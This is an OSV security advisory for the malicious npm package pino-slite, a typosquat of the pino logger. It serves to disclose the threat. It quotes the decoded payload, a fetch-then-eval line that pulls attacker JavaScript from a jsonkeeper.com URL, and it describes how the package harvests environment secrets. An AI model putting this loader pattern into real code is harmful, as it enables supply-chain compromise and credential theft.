MAL-2026-6078

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6078
Aliases
  • GHSA-4m74-rvqg-rg5w
Published
2026-06-17T21:40:46Z
Modified
2026-09-01T11:31:12Z
Summary
Malicious code in pino-slite (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)

pino-slite impersonates the legitimate pino logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named pino). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);}), executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a data object containing {...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006944",
            "import_time": "2026-06-17T21:42:18.197754588Z",
            "modified_time": "2026-06-17T21:40:46Z",
            "sha256": "7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e",
            "source": "amazon-inspector",
            "versions": [
                "4.1.16"
            ]
        },
        {
            "id": "IN-MAL-2026-006945",
            "import_time": "2026-06-17T21:42:18.296198728Z",
            "modified_time": "2026-06-17T21:40:49Z",
            "sha256": "ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb",
            "source": "amazon-inspector",
            "versions": [
                "4.1.12"
            ]
        },
        {
            "id": "RLMA-2026-05223",
            "import_time": "2026-07-09T09:16:42.943204672Z",
            "modified_time": "2026-07-07T13:04:20Z",
            "sha256": "73bf8200a1764383df2422272fd4d22f82b400dec6aca1f0dcc0532ca2367500",
            "source": "reversing-labs",
            "versions": [
                "4.1.12",
                "4.1.16"
            ]
        },
        {
            "id": "RLUA-2026-05594",
            "import_time": "2026-07-20T13:15:03.81501971Z",
            "modified_time": "2026-07-20T10:53:57Z",
            "sha256": "3564819f0578784665cf6210bbe209550fada1dfdd9f1285988b9a8add4ca3ee",
            "source": "reversing-labs"
        },
        {
            "id": "RLUA-2026-06380",
            "import_time": "2026-09-01T11:18:16.05193793Z",
            "modified_time": "2026-08-24T17:04:12Z",
            "sha256": "62a1881c2543bf668adc93680dee08b4f89a5629cb14ebb4c33300376d9f6c23",
            "source": "reversing-labs"
        }
    ]
}
References
Credits

Affected packages

npm / pino-slite

Package

Affected ranges

Affected versions

4.*
4.1.12
4.1.16

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "lib/writer.js",
            "sha256": "b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f",
            "tlsh": "c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70"
        },
        {
            "path": "package.json",
            "sha256": "e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b",
            "tlsh": "b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d"
        }
    ],
    "package_integrity": [
        {
            "filename": "pino-slite-4.1.16.tgz",
            "hashes": {
                "sha1": "1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f",
                "sha512_sri": "sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json"